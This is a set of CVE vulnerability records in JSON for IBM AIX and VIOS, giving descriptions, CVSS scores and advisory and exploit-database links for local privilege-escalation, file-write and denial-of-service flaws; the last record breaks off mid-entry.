{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:32:57.397Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/238640" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\n\u003cspan style=\"background-color: rgb(204, 217, 226);\"\u003eIBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX NFS kernel extension to cause a denial of service. IBM X-Force ID: 238640.\u003c/span\u003e\n\n" } ], "value": "\nIBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX NFS kernel extension to cause a denial of service. IBM X-Force ID: 238640.\n\n" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-399", "description": "CWE-399 Resource Management errors", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-23T18:36:05.647Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/238640" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-43380", "datePublished": "2022-12-23T18:35:03.658Z", "dateReserved": "2022-10-17T19:55:40.484Z", "dateUpdated": "2024-08-03T13:32:57.397Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-3977
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T10:57:18.063Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "IV60312", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60312" }, { "name": "IV60314", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60314" }, { "name": "IV60299", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60299" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://packetstormsecurity.com/files/127067/IBM-AIX-6.1.8-Privilege-Escalation.html" }, { "name": "aix-libodm-symlink(93595)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93595" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/" }, { "name": "1030401", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1030401" }, { "name": "IV60313", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60313" }, { "name": "33725", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "http://www.exploit-db.com/exploits/33725" }, { "name": "IV60303", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60303" }, { "name": "IV60311", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60311" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-06-05T00:00:00", "descriptions": [ { "lang": "en", "value": "libodm.a in IBM AIX 6.1 and 7.1, and VIOS 2.2.x, allows local users to overwrite arbitrary files via a symlink attack on a temporary file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-2179." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-28T12:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "IV60312", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60312" }, { "name": "IV60314", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60314" }, { "name": "IV60299", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60299" }, { "tags": [ "x_refsource_MISC" ], "url": "http://packetstormsecurity.com/files/127067/IBM-AIX-6.1.8-Privilege-Escalation.html" }, { "name": "aix-libodm-symlink(93595)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93595" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/" }, { "name": "1030401", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1030401" }, { "name": "IV60313", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60313" }, { "name": "33725", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "http://www.exploit-db.com/exploits/33725" }, { "name": "IV60303", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60303" }, { "name": "IV60311", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60311" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2014-3977", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "libodm.a in IBM AIX 6.1 and 7.1, and VIOS 2.2.x, allows local users to overwrite arbitrary files via a symlink attack on a temporary file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-2179." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "IV60312", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60312" }, { "name": "IV60314", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60314" }, { "name": "IV60299", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60299" }, { "name": "http://packetstormsecurity.com/files/127067/IBM-AIX-6.1.8-Privilege-Escalation.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/127067/IBM-AIX-6.1.8-Privilege-Escalation.html" }, { "name": "aix-libodm-symlink(93595)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93595" }, { "name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/", "refsource": "MISC", "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/" }, { "name": "1030401", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1030401" }, { "name": "IV60313", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60313" }, { "name": "33725", "refsource": "EXPLOIT-DB", "url": "http://www.exploit-db.com/exploits/33725" }, { "name": "IV60303", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60303" }, { "name": "IV60311", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60311" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2014-3977", "datePublished": "2014-06-08T23:00:00", "dateReserved": "2014-06-05T00:00:00", "dateUpdated": "2024-08-06T10:57:18.063Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4887
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6406022 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/190911 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:14:59.190Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6406022" }, { "name": "ibm-aix-cve20204887-file-write (190911)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190911" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2021-01-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2 and AIX VIOS 3.1 could allow a local user to exploit a vulnerability in the gencore user command to create arbitrary files in any directory. IBM X-Force ID: 190911." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/C:N/I:H/AC:L/AV:L/A:N/S:U/PR:N/UI:N/E:U/RL:O/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Data Manipulation", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-01-20T15:00:27", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6406022" }, { "name": "ibm-aix-cve20204887-file-write (190911)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190911" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-01-19T00:00:00", "ID": "CVE-2020-4887", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2 and AIX VIOS 3.1 could allow a local user to exploit a vulnerability in the gencore user command to create arbitrary files in any directory. IBM X-Force ID: 190911." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "L", "C": "N", "I": "H", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Data Manipulation" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6406022", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6406022 (AIX)", "url": "https://www.ibm.com/support/pages/node/6406022" }, { "name": "ibm-aix-cve20204887-file-write (190911)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190911" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4887", "datePublished": "2021-01-20T15:00:27.437225Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-16T19:56:36.264Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-8972
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id/1037480 | vdb-entry, x_refsource_SECTRACK | |
http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc | x_refsource_CONFIRM | |
http://www.securityfocus.com/bid/94979 | vdb-entry, x_refsource_BID | |
https://www.exploit-db.com/exploits/40950/ | exploit, x_refsource_EXPLOIT-DB |
▼ | Vendor | Product |
---|---|---|
IBM Corporation | AIX |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T02:35:02.333Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1037480", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1037480" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc" }, { "name": "94979", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/94979" }, { "name": "40950", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/40950/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM Corporation", "versions": [ { "status": "affected", "version": "6.1" }, { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2016-12-15T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 6.1, 7.1, and 7.2 could allow a local user to gain root privileges using a specially crafted command within the bellmail client. IBM APARs: IV91006, IV91007, IV91008, IV91010, IV91011." } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-02T09:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "1037480", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1037480" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc" }, { "name": "94979", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/94979" }, { "name": "40950", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/40950/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2016-8972", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "6.1" }, { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM Corporation" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 6.1, 7.1, and 7.2 could allow a local user to gain root privileges using a specially crafted command within the bellmail client. IBM APARs: IV91006, IV91007, IV91008, IV91010, IV91011." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "1037480", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1037480" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc" }, { "name": "94979", "refsource": "BID", "url": "http://www.securityfocus.com/bid/94979" }, { "name": "40950", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/40950/" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2016-8972", "datePublished": "2017-02-15T19:00:00", "dateReserved": "2016-10-25T00:00:00", "dateUpdated": "2024-08-06T02:35:02.333Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4829
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6380430 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/189960 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:14:58.424Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6380430" }, { "name": "ibm-aix-cve20204829-priv-escalation (189960)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/189960" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2020-12-09T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in the ksu user command to gain root privileges. IBM X-Force ID: 189960." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 7.3, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AC:L/PR:N/A:H/I:H/AV:L/S:U/UI:N/C:H/RL:O/RC:C/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-12-10T22:11:07", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6380430" }, { "name": "ibm-aix-cve20204829-priv-escalation (189960)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/189960" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-12-09T00:00:00", "ID": "CVE-2020-4829", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in the ksu user command to gain root privileges. IBM X-Force ID: 189960." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "H", "I": "H", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6380430", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6380430 (AIX)", "url": "https://www.ibm.com/support/pages/node/6380430" }, { "name": "ibm-aix-cve20204829-priv-escalation (189960)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/189960" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4829", "datePublished": "2020-12-10T22:11:07.430051Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-16T18:04:01.484Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45168
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7086090 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267966 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.863Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7086090" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267966" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to execute arbitrary commands. IBM X-Force ID: 267966." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to execute arbitrary commands. IBM X-Force ID: 267966." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-01T14:10:24.508Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7086090" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267966" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX command execution", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45168", "datePublished": "2023-12-01T14:10:24.508Z", "dateReserved": "2023-10-05T01:38:44.721Z", "dateUpdated": "2024-08-02T20:14:19.863Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45170
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7095022 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267968 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.875Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7095022" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267968" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piobe command to escalate privileges or cause a denial of service. IBM X-Force ID: 267968." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piobe command to escalate privileges or cause a denial of service. IBM X-Force ID: 267968." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "264 Permissions, Privileges, Access Controls", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-13T23:05:51.491Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7095022" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267968" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX privilege escalation", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45170", "datePublished": "2023-12-13T23:05:51.491Z", "dateReserved": "2023-10-05T01:38:44.722Z", "dateUpdated": "2024-08-02T20:14:19.875Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-4011
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:30:49.435Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "54215", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/54215" }, { "name": "IV43562", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43562" }, { "name": "1028792", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1028792" }, { "name": "aix-cve20134011-infiniband(85617)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85617" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/infiniband_advisory.asc" }, { "name": "IV43580", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43580" }, { "name": "oval:org.mitre.oval:def:19167", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19167" }, { "name": "IV43827", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43827" }, { "name": "95419", "tags": [ "vdb-entry", 